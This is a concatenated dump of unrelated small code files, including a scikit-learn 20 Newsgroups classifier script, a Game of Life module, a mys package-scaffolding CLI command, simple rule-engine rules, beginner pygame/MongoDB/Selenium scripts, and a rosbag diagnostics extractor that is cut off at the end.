#from sklearn.feature_extraction.text import TfidfTransformer
# classifier modules
from sklearn.svm import LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn.linear_model import Perceptron
from sklearn.naive_bayes import BernoulliNB, MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import NearestCentroid
from sklearn.ensemble import RandomForestClassifier
from sklearn import metrics
from sklearn import svm#, datasets
from sklearn.metrics import roc_curve, auc
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import average_precision_score
from sklearn.cross_validation import train_test_split
from sklearn.preprocessing import label_binarize
from sklearn.multiclass import OneVsRestClassifier
from scipy import interp
from sklearn.grid_search import GridSearchCV
import matplotlib.pyplot as plt
from sklearn.pipeline import Pipeline
#from pprint import pprint
from time import time
def prepare_data(data_train, data_test):
    """Vectorise the raw documents into TF-IDF feature matrices.

    The vectoriser is fitted on the training corpus only and then applied
    to the test corpus, so both matrices share one vocabulary.
    """
    tfidf = TfidfVectorizer()
    train_matrix = tfidf.fit_transform(data_train.data)
    test_matrix = tfidf.transform(data_test.data)
    return train_matrix, test_matrix
def MNB(data_train, data_train_vectors, data_test_vectors, **kwargs):
    """Train a Multinomial Naive Bayes model and return predicted labels.

    ``kwargs`` is accepted for signature uniformity but unused.
    """
    model = MultinomialNB(alpha=.01)
    model.fit(data_train_vectors, data_train.target)
    return model.predict(data_test_vectors)
def BNB(data_train, data_train_vectors, data_test_vectors, **kwargs):
    """Train a Bernoulli Naive Bayes model and return predicted labels.

    ``kwargs`` is accepted for signature uniformity but unused.
    """
    model = BernoulliNB(alpha=.01)
    model.fit(data_train_vectors, data_train.target)
    return model.predict(data_test_vectors)
def KNN(data_train, data_train_vectors, data_test_vectors, **kwargs):
    """Train a 5-nearest-neighbours classifier and return predicted labels.

    ``kwargs`` is accepted for signature uniformity but unused.
    """
    model = KNeighborsClassifier(n_neighbors=5)
    return model.fit(data_train_vectors, data_train.target).predict(data_test_vectors)
def NC(data_train, data_train_vectors, data_test_vectors, **kwargs):
    """Train a Nearest-Centroid classifier and return predicted labels.

    ``kwargs`` is accepted for signature uniformity but unused.
    """
    model = NearestCentroid()
    return model.fit(data_train_vectors, data_train.target).predict(data_test_vectors)
def SVM(data_train, data_train_vectors, data_test_vectors, **kwargs):
    """Train a LinearSVC and return decision-function SCORES (not labels).

    Unlike the other wrappers, the caller receives continuous margins,
    which the ROC/PR plotting helpers expect.
    ``kwargs`` is accepted for signature uniformity but unused.
    """
    model = LinearSVC()
    model.fit(data_train_vectors, data_train.target)
    return model.decision_function(data_test_vectors)
def PERCEPTRON(data_train, data_train_vectors, data_test_vectors, **kwargs):
    """Train a Perceptron classifier and return predicted labels.

    ``kwargs`` is accepted for signature uniformity but unused.
    """
    model = Perceptron()
    return model.fit(data_train_vectors, data_train.target).predict(data_test_vectors)
def RF(data_train, data_train_vectors, data_test_vectors, **kwargs):
    """Train a Random Forest classifier and return predicted labels.

    ``kwargs`` is accepted for signature uniformity but unused.
    """
    model = RandomForestClassifier()
    return model.fit(data_train_vectors, data_train.target).predict(data_test_vectors)
def SGD(data_train, data_train_vectors, data_test_vectors, **kwargs):
    """Train an SGD (linear) classifier and return predicted labels.

    ``kwargs`` is accepted for signature uniformity but unused.
    """
    model = SGDClassifier()
    return model.fit(data_train_vectors, data_train.target).predict(data_test_vectors)
def evaluation_score(data_test, y_pred, **kwargs):
    """Print F1, accuracy, confusion matrix, recall and precision (Python 2).

    NOTE(review): the 'average' kwarg is only forwarded to f1_score;
    recall_score/precision_score use their binary defaults, which fails
    for multi-class targets. Returns 0 unconditionally.
    """
    avg = kwargs.pop('average','binary')
    print "F1-measure:",metrics.f1_score(data_test.target, y_pred, average=avg)
    print "Testing Accuracy:",metrics.accuracy_score(data_test.target,y_pred)
    print "Confusion Matrix:\n",metrics.confusion_matrix(data_test.target, y_pred)
    print "Sensitivity:",metrics.recall_score(data_test.target, y_pred)
    print "Precision:",metrics.precision_score(data_test.target, y_pred)
    return 0
def ROC_binary_class(data_test, y_pred_score):
    """Plot the ROC curve and print the AUC for a binary classifier.

    Expects decision-function scores (not hard labels). Draws onto the
    current matplotlib figure; returns 0 unconditionally.
    """
    fpr, tpr, thresholds = metrics.roc_curve(data_test.target, y_pred_score)
    # print "fpr:",fpr
    # print "tpr:",tpr
    print"AUC-ROC Score:", metrics.roc_auc_score(data_test.target, y_pred_score)
    plt.plot(fpr, tpr)
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.0])
    plt.title('ROC curve for classifier')
    plt.xlabel('False Positive Rate (1 - Specificity)')
    plt.ylabel('True Positive Rate (Sensitivity)')
    plt.grid(True)
    return 0
def PR_binary_class(data_test, y_pred_score):
    """Plot the precision-recall curve for a binary classifier.

    Expects decision-function scores. Draws onto the current matplotlib
    figure; returns 0 unconditionally.
    NOTE(review): the axes are labelled Precision (x) vs Recall (y), the
    opposite of the conventional PR plot -- verify intent.
    """
    precision, recall, _ = precision_recall_curve(data_test.target, y_pred_score)
    #print"AUC-ROC Score:", metrics.roc_auc_score(data_test.target, y_pred)
    plt.plot(precision, recall)
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.0])
    plt.title('PR curve for classifier')
    plt.xlabel('Precision')
    plt.ylabel('Recall')
    plt.grid(True)
    return 0
def ROC_multi_class(data_train, data_test, data_test_vectors):
    """Plot one-vs-rest ROC curves (per class + micro/macro averages) for 3 classes.

    NOTE(review): this function reads the module-level global
    ``data_train_vectors`` (created in ``__main__``) instead of taking it
    as a parameter, so it only works when the script is run end to end.
    Returns 0 unconditionally.
    """
    # Binarize the output
    y_train_label = label_binarize(data_train.target, classes=[0, 1, 2])
    n_classes = y_train_label.shape[1]

    random_state = np.random.RandomState(1)

    # shuffle and split training and test sets
    X_train, X_test, y_train, y_test = train_test_split(data_train_vectors, y_train_label, test_size=.5,
                                                        random_state=0)

    # Learn to predict each class against the other
    classifier = OneVsRestClassifier(svm.SVC(kernel='linear', probability=True, random_state=random_state))
    classifier.fit(X_train, y_train)
    y_pred_score = classifier.decision_function(data_test_vectors)

    y_test_label = label_binarize(data_test.target, classes=[0, 1, 2])

    # Compute ROC curve and ROC area for each class
    fpr = dict()
    tpr = dict()
    roc_auc = dict()
    for i in range(n_classes):
        fpr[i], tpr[i], _ = roc_curve(y_test_label[:, i], y_pred_score[:, i])
        roc_auc[i] = auc(fpr[i], tpr[i])

    # Compute micro-average ROC curve and ROC area
    fpr["micro"], tpr["micro"], _ = roc_curve(y_test_label.ravel(), y_pred_score.ravel())
    roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])

    # Plot ROC curves for the multiclass problem
    # Compute macro-average ROC curve and ROC area
    # First aggregate all false positive rates
    all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))

    # Then interpolate all ROC curves at this points
    mean_tpr = np.zeros_like(all_fpr)
    for i in range(n_classes):
        mean_tpr += interp(all_fpr, fpr[i], tpr[i])

    # Finally average it and compute AUC
    mean_tpr /= n_classes

    fpr["macro"] = all_fpr
    tpr["macro"] = mean_tpr
    roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])

    # Plot all ROC curves
    plt.figure()
    # plt.plot(fpr["micro"], tpr["micro"],
    #          label='micro-average ROC curve (area = {0:0.2f})'
    #                ''.format(roc_auc["micro"]),
    #          linewidth=2)
    #
    # plt.plot(fpr["macro"], tpr["macro"],
    #          label='macro-average ROC curve (area = {0:0.2f})'
    #                ''.format(roc_auc["macro"]),
    #          linewidth=2)

    for i in range(n_classes):
        plt.plot(fpr[i], tpr[i], label='ROC curve of class {0} (area = {1:0.2f})'
                 ''.format(i, roc_auc[i]))

    plt.plot([0, 1], [0, 1], 'k--')
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.05])
    plt.xlabel('False Positive Rate')
    plt.ylabel('True Positive Rate')
    plt.title('Receiver operating characteristic of multi-class')
    plt.legend(loc="lower right")
    plt.show()
    return 0
def PR_multi_class(data_train, data_test, data_test_vectors):
    """Plot one-vs-rest precision-recall curves for the 3-class problem.

    NOTE(review): like ROC_multi_class, this reads the module-level global
    ``data_train_vectors`` instead of taking it as a parameter, so it only
    works when the script is run end to end. Returns 0 unconditionally.
    """
    # Binarize the output
    y_train_label = label_binarize(data_train.target, classes=[0, 1, 2])
    n_classes = y_train_label.shape[1]

    random_state = np.random.RandomState(0)

    # shuffle and split training and test sets
    X_train, X_test, y_train, y_test = train_test_split(data_train_vectors, y_train_label, test_size=.5,
                                                        random_state=random_state)

    # Learn to predict each class against the other
    classifier = OneVsRestClassifier(svm.SVC(kernel='linear', probability=True, random_state=random_state))
    classifier.fit(X_train, y_train)
    y_pred_score = classifier.decision_function(data_test_vectors)

    y_test_label = label_binarize(data_test.target, classes=[0, 1, 2])

    # Compute Precision-Recall and plot curve
    precision = dict()
    recall = dict()
    average_precision = dict()
    for i in range(n_classes):
        precision[i], recall[i], _ = precision_recall_curve(y_test_label[:, i], y_pred_score[:, i])
        average_precision[i] = average_precision_score(y_test_label[:, i], y_pred_score[:, i])

    # Compute micro-average ROC curve and ROC area
    precision["micro"], recall["micro"], _ = precision_recall_curve(y_test_label.ravel(), y_pred_score.ravel())
    average_precision["micro"] = average_precision_score(y_test_label, y_pred_score, average="micro")

    # Plot Precision-Recall curve for each class
    plt.clf()
    # plt.plot(recall["micro"], precision["micro"],
    #          label='micro-average PR curve (area = {0:0.2f})'
    #                ''.format(average_precision["micro"]))
    for i in range(n_classes):
        plt.plot(recall[i], precision[i],
                 label='PR curve of class {0} (area = {1:0.2f})'
                       ''.format(i, average_precision[i]))

    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.05])
    plt.xlabel('Recall')
    plt.ylabel('Precision')
    plt.title('Precision-Recall curve of multi-class')
    plt.legend(loc="lower right")
    plt.show()
    return 0
def best_parameters_selection():
    """Placeholder for hyper-parameter search (e.g. with GridSearchCV).

    TODO: not implemented; currently does nothing and returns 0.
    """
    return 0
def benchmark(clf, data_train, data_test):
    """Time fitting and prediction of *clf* on TF-IDF features (Python 2).

    Re-vectorises the raw text on every call, prints the timings and
    returns (classifier_name, train_time, test_time).
    """
    y_train = data_train.target
    # Fit the vocabulary on the training corpus only, then reuse it.
    vectorizer = TfidfVectorizer()
    X_train = vectorizer.fit_transform(data_train.data)
    X_test = vectorizer.transform(data_test.data)

    print(clf)
    t0 = time()
    clf.fit(X_train, y_train)
    train_time = time() - t0
    print("train time: %0.3fs" % train_time)

    t0 = time()
    clf.predict(X_test)
    test_time = time() - t0
    print("test time: %0.3fs" % test_time)

    # Classifier name = the class-name portion of its repr().
    clf_descr = str(clf).split('(')[0]
    return clf_descr, train_time, test_time
def plot_benchmark(clf, data_train, data_test):
    """Run benchmark() for one classifier and plot the timings as bars.

    NOTE(review): the train/test times here are scalars, so dividing by
    np.max(...) always normalises them to 1.0 -- the bar heights carry no
    information until several classifiers are compared. Returns 0.
    """
    #results = []
    #results.append(benchmark(clf, data_train, data_test))
    #indices = np.arange(len(results))
    #results = [[x[i] for x in results] for i in range(1)]
    clf_names, training_time, test_time = benchmark(clf, data_train, data_test)
    training_time = np.array(training_time) / np.max(training_time)
    test_time = np.array(test_time) / np.max(test_time)

    plt.figure(figsize=(12, 8))
    #plt.title("Score")
    #plt.barh(indices, score, .2, label="score", color='r')
    plt.barh( .3, training_time, .2, label="training time", color='g')
    plt.barh( .6, test_time, .2, label="test time", color='b')
    plt.yticks(())
    plt.legend(loc='best')
    plt.subplots_adjust(left=.25)
    plt.subplots_adjust(top=.95)
    plt.subplots_adjust(bottom=.05)

    plt.text(-.3,0 ,clf_names)
    plt.show()
    return 0
if __name__=='__main__':
    # Driver: load two newsgroup categories, vectorise, run LinearSVC and
    # draw the binary + multi-class ROC/PR plots. (Python 2 prints below.)

    # Load some categories from the data set
    categories = ['alt.atheism', 'comp.graphics']#, 'sci.space']
    # Uncomment the following to do the analysis on all the categories
    #categories = None

    print("Loading 20 newsgroups dataset for categories:")
    print(categories)

    # Training data
    data_train = fetch_20newsgroups(subset='train', remove=('headers', 'footers', 'quotes'), categories=categories)
    print("%d Training documents" % len(data_train.filenames))
    print("%d Training categories" % len(data_train.target_names))
    print "\n"

    # Testing data
    data_test = fetch_20newsgroups(subset='test', remove=('headers', 'footers', 'quotes'), categories=categories)
    print("%d Testing documents" % len(data_test.filenames))
    print("%d Testing categories" % len(data_test.target_names))
    print "\n"

    # NOTE: data_train_vectors is also read as a global by the
    # *_multi_class plotting helpers above.
    data_train_vectors, data_test_vectors = prepare_data(data_train,data_test)
    print data_train_vectors.shape,data_test_vectors.shape

    # SVM() returns decision-function scores, which the plots expect.
    y_pred_score = SVM(data_train, data_train_vectors,data_test_vectors)
    #print y_pred.shape

    #evaluation_score(data_test, y_pred_score)#, average='weighted')

    plt.figure(121)
    ROC_binary_class(data_test, y_pred_score)
    plt.figure(122)
    PR_binary_class(data_test, y_pred_score)
    plt.figure(123)
    ROC_multi_class(data_train, data_test, data_test_vectors)
    plt.figure(124)
    PR_multi_class(data_train, data_test, data_test_vectors)

    #plot_benchmark(LinearSVC(), data_train, data_test)
    #benchmark(LinearSVC(), data_train, data_test)
3c4de75ed43953a08fb4e2146dfc78b2086f7351 | Python | sophialuo/CrackingTheCodingInterview_6thEdition | /16.10.py | UTF-8 | 1,295 | 4.34375 | 4 | [] | no_license | '''16.10
Living People: Given a list of people with their birth and death years, implement a method to compute the year with the most number of people alive.
You may assume that all people were born between 1900 and 2000 (inclusive). If a person was alive during any portion of that year, they should be
included in that year's count. For example, Person (birth = 1908, death = 1909) is included in the counts for both 1908 and 1909.
'''
#lst of tuples is input
def living_people(lst):
births, deaths = {}, {}
min_birth, max_death = 99999999999, -1
for tupl in lst:
birth, death = tupl
death = death+1
if birth in births:
births[birth] += 1
else:
births[birth] = 1
if death in deaths:
deaths[death] += 1
else:
deaths[death] = 1
if birth < min_birth:
min_birth = birth
if death > max_death:
max_death = death
max_alive = -1
max_year = 0
cur_alive = 0
for year in range(min_birth, max_death + 1):
if year in births:
cur_alive += births[year]
if year in deaths:
cur_alive -= deaths[year]
if cur_alive > max_alive:
max_year, max_alive = year, cur_alive
return(max_year, max_alive)
lst = [(1, 2), (2, 5), (1, 4), (3, 6), (4, 8), (5, 7), (8, 10), (9, 10), (6, 6)]
print(living_people(lst)) | true |
30f289ee68b8b7a9211284c1756ad14c60745274 | Python | alercunha/life | /game/universe.py | UTF-8 | 949 | 3.09375 | 3 | [] | no_license | from game.utils import offset_cell
class Universe:
    """One generation of live cells in Conway's Game of Life."""

    def __init__(self, gen: list):
        # Fall back to an empty generation when gen is None (or falsy).
        self.gen = gen or list()

    def tick(self) -> list:
        """Advance one generation and return the new list of live cells.

        Counts live neighbours for every cell adjacent to a live cell,
        then keeps the cells whose Neighboor record says they survive.
        """
        # Renamed from 'map' -- the original shadowed the builtin map().
        neighbour_info = {}
        for cell in self.gen:
            neighbour_info.setdefault(cell, Neighboor()).set_alive()
            for step in [(-1, -1), (-1, 0), (-1, +1), (0, -1), (0, +1), (+1, -1), (+1, 0), (+1, +1)]:
                adj_cell = offset_cell(cell, step)
                neighbour_info.setdefault(adj_cell, Neighboor()).increment()
        nextgen = [
            cell for cell, neighboor in neighbour_info.items()
            if neighboor.should_live()
        ]
        self.gen = nextgen
        return nextgen
class Neighboor:
    """Per-cell bookkeeping: live-neighbour count plus an alive flag."""

    def __init__(self):
        # Number of live neighbours recorded so far.
        self.count = 0
        # Whether this cell itself is alive in the current generation.
        self.alive = False

    def increment(self):
        """Record one more live neighbour."""
        self.count += 1

    def set_alive(self):
        """Mark the cell itself as alive."""
        self.alive = True

    def should_live(self):
        """Conway's rules: three neighbours always live; two survive."""
        if self.count == 3:
            return True
        return self.alive and self.count == 2
| true |
b1e06f429c734cccdfdeb0b04362c599b2a24af2 | Python | nsauzede/mys | /mys/cli/subparsers/new.py | UTF-8 | 3,405 | 2.609375 | 3 | [
"MIT"
] | permissive | import getpass
import os
import re
import shutil
import subprocess
from colors import cyan
from ..utils import BULB
from ..utils import ERROR
from ..utils import MYS_DIR
from ..utils import Spinner
from ..utils import box_print
from ..utils import create_file_from_template
class BadPackageNameError(Exception):
    """Raised when a requested package name is not valid lower_snake_case."""
    pass
def git_config_get(item, default=None):
    """Return a ``git config`` value, or *default* when unavailable.

    Falls back to *default* when git is not installed, the command fails,
    or the key is unset.
    """
    command = ['git', 'config', '--get', item]
    try:
        output = subprocess.check_output(command, encoding='utf-8')
    except Exception:
        return default
    return output.strip()
def create_new_file(path, **kwargs):
    """Render *path* from the 'new' template set, forwarding template variables."""
    create_file_from_template(path, 'new', **kwargs)
def validate_package_name(package_name):
    """Raise BadPackageNameError unless *package_name* is lower_snake_case.

    A valid name starts with a lowercase letter and contains only
    lowercase letters, digits and underscores.
    """
    allowed = r'^[a-z][a-z0-9_]*$'
    if re.match(allowed, package_name) is None:
        raise BadPackageNameError()
def find_authors(authors):
    """Return a comma-separated, double-quoted author list for package.toml.

    When no authors were given on the command line, falls back to the
    git identity (or the OS user name with a placeholder e-mail).
    """
    if authors is None:
        user = git_config_get('user.name', getpass.getuser())
        email = git_config_get('user.email', f'{user}@example.com')
        return f'"{user} <{email}>"'

    quoted = [f'"{author}"' for author in authors]
    return ', '.join(quoted)
def do_new(_parser, args, _mys_config):
    """Handle ``mys new``: scaffold a new package in ``args.path``.

    Validates the package name, creates the directory tree and template
    files, then prints follow-up instructions. On an invalid name it
    prints help and raises a bare Exception for the CLI to report.
    """
    package_name = os.path.basename(args.path)
    authors = find_authors(args.authors)

    try:
        with Spinner(text=f"Creating package {package_name}"):
            validate_package_name(package_name)
            os.makedirs(args.path)
            path = os.getcwd()
            os.chdir(args.path)

            try:
                # All template files are rendered relative to the new
                # package directory (the cwd was just changed above).
                create_new_file('package.toml',
                                package_name=package_name,
                                authors=authors)
                create_new_file('.gitignore')
                create_new_file('.gitattributes')
                create_new_file('README.rst',
                                package_name=package_name,
                                title=package_name.replace('_', ' ').title(),
                                line='=' * len(package_name))
                create_new_file('LICENSE')
                shutil.copyfile(os.path.join(MYS_DIR, 'cli/templates/new/pylintrc'),
                                'pylintrc')
                os.mkdir('src')
                create_new_file('src/lib.mys')
                create_new_file('src/main.mys')
            finally:
                # Always restore the original working directory.
                os.chdir(path)
    except BadPackageNameError:
        # NOTE(review): the three cyan(...) f-strings below are adjacent
        # string literals (no commas), so they are concatenated into one
        # list item and the examples print on a single line -- verify intent.
        box_print(['Package names must start with a letter and only',
                   'contain letters, numbers and underscores. Only lower',
                   'case letters are allowed.',
                   '',
                   'Here are a few examples:',
                   '',
                   f'{cyan("mys new foo")}'
                   f'{cyan("mys new f1")}'
                   f'{cyan("mys new foo_bar")}'],
                  ERROR)

        raise Exception()

    cd = cyan(f'cd {package_name}')
    box_print(['Build and run the new package by typing:',
               '',
               f'{cd}',
               f'{cyan("mys run")}'],
              BULB,
              width=53)
def add_subparser(subparsers):
    """Register the ``new`` command and its arguments on *subparsers*."""
    parser_new = subparsers.add_parser(
        'new',
        description='Create a new package.')
    author_help = ("Package author as 'Mys Lang <mys.lang@example.com>'. May "
                   "be given multiple times.")
    parser_new.add_argument('--author',
                            dest='authors',
                            action='append',
                            help=author_help)
    parser_new.add_argument('path')
    parser_new.set_defaults(func=do_new)
| true |
382458bea36204ba334cd0866d3fbe2b24c553f4 | Python | TheFIUBABoys/tomy-fede-fallas-II | /InferenceEngine/rules.py | UTF-8 | 3,047 | 2.578125 | 3 | [] | no_license | from app.inference_engine.rule import Rule
__author__ = 'tomas'
def _attribute_equals(attribute, value):
    """Build a condition that is true when subject[attribute] == value."""
    def condition(subject):
        return subject[attribute] == value
    return condition


def _set_attribute(attribute, value):
    """Build a consequence that assigns subject[attribute] = value."""
    def consequence(subject):
        subject[attribute] = value
    return consequence


# The 36 hand-written condition/consequence functions were all the same
# two patterns; they are now produced by the factories above.  Every
# original module-level name is kept for backwards compatibility.

# Species -> leg count
condition1 = _attribute_equals('animal', 'dog')
consequence1 = _set_attribute('legsQuantity', '4')
rule1 = Rule('All dogs have 4 legs', condition1, consequence1, {'animal': 'dog'}, ('animal',))

condition2 = _attribute_equals('animal', 'spider')
consequence2 = _set_attribute('legsQuantity', '8')
rule2 = Rule('All spiders have 8 legs', condition2, consequence2, {'animal': 'spider'}, ('animal',))

condition3 = _attribute_equals('animal', 'ostrich')
consequence3 = _set_attribute('legsQuantity', '2')
rule3 = Rule('All ostriches have 2 legs', condition3, consequence3, {'animal': 'ostrich'}, ('animal',))

# Leg count -> locomotion
condition4 = _attribute_equals('legsQuantity', '4')
consequence4 = _set_attribute('locomotion', 'quadruped')
rule4 = Rule('Anything with 4 legs is a quadruped', condition4, consequence4, {'legsQuantity': '4'},
             ('legsQuantity',))

condition5 = _attribute_equals('legsQuantity', '2')
consequence5 = _set_attribute('locomotion', 'biped')
rule5 = Rule('Anything with 2 legs is a biped', condition5, consequence5, {'legsQuantity': '2'},
             ('legsQuantity',))

condition6 = _attribute_equals('legsQuantity', '8')
consequence6 = _set_attribute('locomotion', 'octoped')
rule6 = Rule('Anything with 8 legs is a octoped', condition6, consequence6, {'legsQuantity': '8'},
             ('legsQuantity',))

# Species -> taxonomic class
condition7 = _attribute_equals('animal', 'dog')
consequence7 = _set_attribute('class', 'mammal')
rule7 = Rule('All dogs are mammals', condition7, consequence7, {'animal': 'dog'}, ('animal',))

condition8 = _attribute_equals('animal', 'spider')
consequence8 = _set_attribute('class', 'insect')
rule8 = Rule('All spiders are insects', condition8, consequence8, {'animal': 'spider'}, ('animal',))

condition9 = _attribute_equals('animal', 'ostrich')
consequence9 = _set_attribute('class', 'bird')
rule9 = Rule('All ostriches are birds', condition9, consequence9, {'animal': 'ostrich'}, ('animal',))

# Taxonomic class -> skin covering
condition10 = _attribute_equals('class', 'mammal')
consequence10 = _set_attribute('skin', 'hair')
rule10 = Rule('All mammal have hair', condition10, consequence10, {'class': 'mammal'}, ('class',))

condition11 = _attribute_equals('class', 'insect')
consequence11 = _set_attribute('skin', 'chitin')
rule11 = Rule('All insects have chitin', condition11, consequence11, {'class': 'insect'}, ('class',))

condition12 = _attribute_equals('class', 'bird')
consequence12 = _set_attribute('skin', 'feathers')
rule12 = Rule('All birds have feathers', condition12, consequence12, {'class': 'bird'}, ('class',))

rules = [rule1, rule2, rule3, rule4, rule5, rule6, rule7, rule8, rule9, rule10, rule11, rule12]
| true |
358900be025227f9d6880690c85a0b2ab71a19c0 | Python | kodeskolen/tekna_h19 | /bergen/dag1/volum2.py | UTF-8 | 313 | 3.625 | 4 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 13 16:51:58 2019
@author: Marie
"""
# Tar inn en radius
# Gir ut volum av kule med den radiusen
from math import pi
radius = float(input('Gi meg en radius'))
volum = (4/3)*pi*radius**3
print(f'Volumet av en kule med radius {radius} er {volum:.2f}') | true |
0aed38e10434f306fe7c4c208b0f2aa0e13a2f38 | Python | ydPro-G/seleniumDemo | /selenium/example_tag_4.py | UTF-8 | 282 | 2.9375 | 3 | [] | no_license | from selenium import webdriver
# Start a local Chrome session via Selenium (requires a matching
# chromedriver on PATH -- confirm in the target environment).
biquge = webdriver.Chrome()
# Load a zaobao.com news article.
biquge.get('https://www.zaobao.com/finance/china/story20200617-1061775')
# Select every <p> element by tag name and print each paragraph's text.
elements = biquge.find_elements_by_tag_name('p')  # select elements by their tag name
for element in elements:
    print(element.text)
| true |
18c9964965c0a99029f1f23b96a8c5023045b8e2 | Python | mpenkov/crackingthecodinginterview | /chapter1/test2.py | UTF-8 | 327 | 3.140625 | 3 | [] | no_license | import unittest
from problem2 import reverse
class ReverseTest(unittest.TestCase):
    """Sanity tests for problem2.reverse (string reversal)."""

    def test_sanity(self):
        # assertEquals is a deprecated alias (removed in Python 3.12);
        # use assertEqual instead.
        self.assertEqual(reverse("misha"), "ahsim")
        self.assertEqual(reverse("mikhail"), "liahkim")
        self.assertEqual(reverse("foob"), "boof")
        self.assertEqual(reverse("radar"), "radar")  # palindrome maps to itself
| true |
26b218569455f26c6dfe7acd571febe727e32844 | Python | poojithayadavalli/codekata | /subarrays for a given array with repeated elements.py | UTF-8 | 355 | 3.609375 | 4 | [] | no_license | def sub(list1):
# store all the sublists
sublist = [[]]
# first loop
for i in range(len(list1)+1):
# second loop
for j in range(i+1,len(list1)+1):
# slice the subarray
sub = list1[i:j]
sublist.append(sub)
return sublist
# Input format: first line is the element count (read but unused),
# second line holds the space-separated elements.
x=input()
y=input().split()
# Number of non-empty contiguous subarrays (drop the leading empty list).
print(len(sub(y))-1)
| true |
115689269a5907d66e24564a66d7d8ba62eb67f6 | Python | chenp0088/git | /numbers_3.py | UTF-8 | 95 | 3.609375 | 4 | [] | no_license | squares = []
# Build the squares of 1..10 with a list comprehension instead of the
# manual append loop (same result, more idiomatic).
squares = [value ** 2 for value in range(1, 11)]
print(squares)
| true |
83a61a1541ce41399094d3ee77cdf1a18d1ef287 | Python | derric-d/holbertonschool-higher_level_programming | /0x0B-python-input_output/7-save_to_json_file.py | UTF-8 | 208 | 2.71875 | 3 | [] | no_license | #!/usr/bin/python3
"""doc"""
from json import dumps
def save_to_json_file(my_obj, fn):
    """Serialize my_obj as JSON and write it to the file named fn (UTF-8)."""
    serialized = dumps(my_obj)
    with open(fn, 'w', encoding='utf-8') as out:
        out.write(serialized)
| true |
9b26ac9ba3363826e76e91675c7ca1f1184b642b | Python | Foreverjie/newstart | /MongoTest.py | UTF-8 | 400 | 2.703125 | 3 | [] | no_license | import pymongo
# Connect to a MongoDB server on the default local port and select the
# `students` collection of the `test` database.
client = pymongo.MongoClient(host='localhost', port=27017)
db = client.test
collection = db.students
# Two sample student documents to insert.
student1 = {
    'id': '20170101',
    'name': 'Jordan',
    'age': 20,
    'gender': 'male',
}
student2 = {
    'id': '20170202',
    'name': 'Mike',
    'age': 21,
    'gender': 'male',
}
# insert_many() stores both documents in a single round trip; the result
# object carries the server-generated _ids.
result = collection.insert_many([student1,student2])
print(result)
print(result.inserted_ids) | true |
141361713fcb261e1a0b96c77443e30b349c0212 | Python | codemy-kz/pygame_demo_1 | /test1.py | UTF-8 | 560 | 2.953125 | 3 | [] | no_license | import pygame
# Basic RGB colour constants.
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
BLUE = (0, 0, 255)
GREEN = (0, 255, 0)
RED = (255, 0, 0)
pygame.init()
# Window size: 800 x 480 (80% of 600).
screen_width = 800
screen_height = int(600 * 0.8)
screen = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption("PyGame Test App")
FPS = 60
clock = pygame.time.Clock()
screen.fill(WHITE)
pygame.display.update()
# Main loop: keep running until the window close button is pressed.
flRunning = True
while flRunning:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            flRunning = False
    # Limit the loop to FPS iterations per second.
    clock.tick(FPS)
# Bug fix: pygame.quit() was previously called inside the while loop, which
# uninitialises pygame after the first frame and makes the following
# pygame.event.get() call fail.  Shut down once, after the loop exits.
pygame.quit()
be379530216c94184b6f38b5185714aeb63392bb | Python | dringakn/ROSExamples | /script/extract_rosbag_sensors.py | UTF-8 | 2,818 | 2.84375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python3
"""
Author: Dr. Ing. Ahmad Kamal Nasir
Email: dringakn@gmail.com
Created: 22 Mar 2023
Modified: 14 Mar 2023
Description: Extract libsensors_monitor messages from a rosbag on specified topics into a pickle file.
Example: ./extract_rosbag_sensors.py ~/filename.bag cpu_monitor_topics
Notes: Possible level of operations: OK=0, WARN=1, ERROR=2, STALE=3
"""
import os # filename, extension extraction
import argparse
import rosbag
from diagnostic_msgs.msg import DiagnosticArray, DiagnosticStatus, KeyValue
import pandas as pd
import numpy as np
import time
def main():
    """Read diagnostic messages from a rosbag, flatten them, pivot into a
    time-indexed DataFrame, save it as a pickle and plot the temperatures."""
    parser = argparse.ArgumentParser(description="Extract libsensors_monitor messages from a rosbag on specified topics into a pickle file.")
    parser.add_argument("bag_file", help="Input ROS bag. (e.g. /path/to/filename.bag)")
    parser.add_argument("--topic", help="libsensors_monitor topic.", default="/diagnostics")
    args = parser.parse_args()
    # Output files live next to the input bag and are named after it.
    input_file, input_file_extension = os.path.splitext(os.path.basename(args.bag_file))
    output_path = os.path.dirname(args.bag_file)
    output_file = f"{output_path}/{input_file}_diagnostics.pickle"
    bag = rosbag.Bag(args.bag_file, "r")
    print(f"Extracting cpu_monitor data from {args.bag_file} on topic(s) {args.topic} into {output_file}")
    count = 0
    # One flat record per (message, component, key/value entry).
    msgs = {'time': [], 'level': [], 'name': [], 'message': [], 'hardware_id': [], 'key': [], 'value': []}
    for topic, msg, t in bag.read_messages(topics=[args.topic]):
        for c in msg.status: # List of components
            for item in c.values:
                # Sanitise the component name so it works as a column label.
                name = c.name.replace("/", "_").replace(" ", "_").replace(":","_")
                msgs['time'].append(t.to_sec())
                msgs['level'].append(c.level)
                msgs['name'].append(name)
                msgs['message'].append(c.message)
                msgs['hardware_id'].append(c.hardware_id)
                msgs['key'].append(item.key)
                msgs['value'].append(item.value)
                count += 1
    bag.close()
    print(f"Saving {count} messages as pickle file...")
    df = pd.DataFrame(msgs)
    # Wide table: one column per (component name, key), indexed by timestamp.
    df = df.pivot_table(index='time', columns=['name','key'], values='value')
    df.index = pd.to_datetime(df.index.map(time.ctime))
    # Forward-fill gaps, then drop rows that are still incomplete.
    df = df.ffill().dropna()
    df.to_pickle(output_file)
    # names = [col for col in df.columns for name in col if name in ['Fan Speed (RPM)', 'Temperature (C)']]
    names = [col for col in df.columns for name in col if name in ['Temperature (C)']]
    # Smooth the temperature columns with a 100-sample rolling mean and save the figure.
